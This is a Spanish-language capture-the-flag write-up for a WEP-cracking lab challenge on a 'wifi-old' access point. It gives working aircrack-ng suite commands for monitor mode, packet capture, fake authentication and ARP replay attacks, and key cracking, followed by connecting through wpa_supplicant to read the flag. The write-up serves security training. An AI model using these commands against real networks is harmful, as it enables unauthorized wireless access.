07. What is the flag on the wifi-old AP website?

100 puntos


  • Activar modo monitor sobre interfaz detectada

sudo airmon-ng start <wlan_interface>
  • Realizar escaneo sobre red objetivo

sudo airodump-ng --write traffic --essid wifi-old --channel <channel_number> <wlan_interface>
  • Si se presenta un error por channel hopping en el canal del AP, agregar el parámetro --ignore-negative-one al escaneo con Airodump-ng

sudo airodump-ng --ignore-negative-one --write traffic --essid wifi-old --channel <channel_number> <wlan_interface>
  • Generar exceso de tráfico realizando autenticación falsa sobre el AP mediante un Fake Authentication Attack

sudo aireplay-ng --fakeauth 3600 -q 10 -a <BSSID_AP> <wlan_interface>
  • De forma paralela al Fake Authentication Attack, generar tráfico lanzando un ARP Replay Attack

sudo aireplay-ng --arpreplay -b <BSSID_AP> -h <MAC_WLAN_INTERFACE> <wlan_interface>
  • Tras realizar ambos ataques, utilizar Aircrack-ng sobre el fichero de tráfico capturado con Airodump-ng para decifrar la contraseña mediante un ataque de diccionario

sudo aircrack-ng traffic-01.cap
  • Se crea fichero lab-07.conf para conectarse con dicho AP mediante wpa_supplicant

network={
    ssid="wifi-old"
    key_mgmt=NONE
    wep_key0=XXXXX
    wep_tx_keyidx=0
}
  • Recordad que al definir la contraseña de autenticación en un fichero file.conf, dependiendo el formato de esta es como se debe ingresar.

# Si la password es un valor hexadecimal como AA:BB:CC:11
# se deben eliminar todos los dos puntos (:)
wep_key0=AABBCC11

# Si la password es una cadena ASCII se debe escribir entre comillas dobles ("password")
wep_key0="password"
  • Se ejecuta wpa_supplicant sobre el fichero creado, indicando el driver dispuesto por la tarjeta de red a utilizar (nl80211 es el driver por defecto para interfaces desde sistemas Linux), y la interfaz de red wlan2 (interfaz disponible)

sudo wpa_supplicant -Dnl80211 -iwlan2 -c lab-07.conf
  • Desde una terminal en paralelo, ejecutar dhclient sobre la interfaz wlan2 para solicitar la asignación de una dirección IP

sudo dhclient wlan2 -v
  • De la asignación de IP por DHCP se aprecia que la red del AP corresponde a la 192.168.1.1 y la IP asignada de host sobre la interfaz wlan2 es la 192.168.1.84

  • Acceder vía navegador a la IP del AP (192.168.1.1) para visualizar la flag desde el sitio de login


RESUELTO